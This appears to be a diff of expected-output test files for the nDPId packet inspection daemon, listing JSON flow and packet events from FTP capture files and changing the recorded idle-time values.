00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383123629078,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383123629078,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"}
00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":51,"packets-processed":51,"total-skipped-flows":0,"total-l4-data-len":4690,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1383123629412}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 51/51

36
test/results/ftp.pcap.out
View File

@@ -1,23 +1,23 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1552590234892}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590234892,"flow_last_seen":1552590234892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590234892,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"}
00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"}
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590234892,"flow_last_seen":1552590234892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590234892,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"}
00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"}
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
